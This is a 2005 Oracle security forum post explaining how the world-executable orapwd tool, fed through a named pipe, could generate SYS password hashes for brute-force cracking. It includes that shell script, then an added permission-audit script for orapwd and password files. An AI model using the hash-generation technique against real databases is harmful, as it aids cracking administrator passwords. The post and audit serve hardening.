Oracle Security is easier if you design for it
orapwd to crack sys hash?
« on: Sep 20th, 2005, 1:51pm »
I've been playing with orapwd. Orapwd is 'world' executable on a standard Oracle installation. It allows you to change/set the SYS password. The password is stored in $ORACLE_HOME/dbs/orapw<SID>.
But any OS user can execute it and create his own password-file. If the password-file doesn't exist, it's created; if it exists you get an error: OPW-00005: File with same name exists. If you use the force=y option the password-file is recreated. How can you use orapwd to crack SYS's password? Well, if you happen to have the hash value of SYS's password (very improbable I think) you could generate all possible hashes with orapwd (although probably not as fast as orabf; I did a test with 26 passwords, from A to Z, and it took 0.6 seconds):
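# Author: I.A. Saez Scheihing
# create a named pipe to stand in for the password file
mknod pijp p
# background reader: append everything written to the pipe to output.txt
while true; do cat < pijp >> output.txt; done &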
orapwd file=pijp password=a force=y
orapwd file=pijp password=b force=y
orapwd file=pijp password=c force=y
orapwd file=pijp password=d force=y
orapwd file=pijp password=e force=y
orapwd file=pijp password=f force=y
orapwd file=pijp password=g force=y
orapwd file=pijp password=h force=y
orapwd file=pijp password=j force=y
orapwd file=pijp password=k force=y
orapwd file=pijp password=l force=y
orapwd file=pijp password=m force=y
orapwd file=pijp password=n force=y
orapwd file=pijp password=o force=y
orapwd file=pijp password=p force=y
# end script
So after 'password=' you could try all password combinations. After completion you would find all possible hashes in file output.txt!
By the way:
I don't think everyone should be allowed to execute orapwd. This tool is meant for oracle only.
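A permission audit for the point the post ends on, added here as an example and not part of the original post. It assumes the standard layout named above ($ORACLE_HOME/bin/orapwd and $ORACLE_HOME/dbs/orapw<SID>); the function names audit_orapwd and has_perm are made up for this example.

```shell
#!/bin/sh
# Added example: report when orapwd or the password files are open to every OS user.
# Assumption: orapwd is at $ORACLE_HOME/bin/orapwd, password files at $ORACLE_HOME/dbs/orapw*.
# Usage: audit_orapwd "$ORACLE_HOME"

# has_perm PATH OCTAL: succeeds if PATH has all the permission bits in OCTAL set.
has_perm() {
    [ -n "$(find "$1" -prune -perm "-$2" -print 2>/dev/null)" ]
}

# audit_orapwd ORACLE_HOME
# Prints one line per finding. Returns 0 if clean, 1 on findings, 2 if the home is unusable.
audit_orapwd() {
    home=$1
    findings=0
    [ -d "$home" ] || { echo "ERROR: not a directory: $home"; return 2; }

    # The tool itself: the other-execute bit lets any OS user run it.
    bin="$home/bin/orapwd"
    if [ -e "$bin" ] && has_perm "$bin" 0001; then
        echo "FINDING: $bin is executable by any OS user"
        findings=1
    fi

    # The password files hold the SYS password hash.
    for pw in "$home"/dbs/orapw*; do
        [ -f "$pw" ] || continue    # glob did not match, or not a regular file
        if has_perm "$pw" 0004; then
            echo "FINDING: $pw is world-readable"
            findings=1
        fi
        if has_perm "$pw" 0002; then
            echo "FINDING: $pw is world-writable"
            findings=1
        fi
    done

    # A world-writable dbs directory lets any user create or replace files in it.
    if [ -d "$home/dbs" ] && has_perm "$home/dbs" 0002; then
        echo "FINDING: $home/dbs is world-writable"
        findings=1
    fi
    return $findings
}
```

The return code makes the function usable from a scheduled job: 0 means nothing to report, 1 means at least one finding was printed.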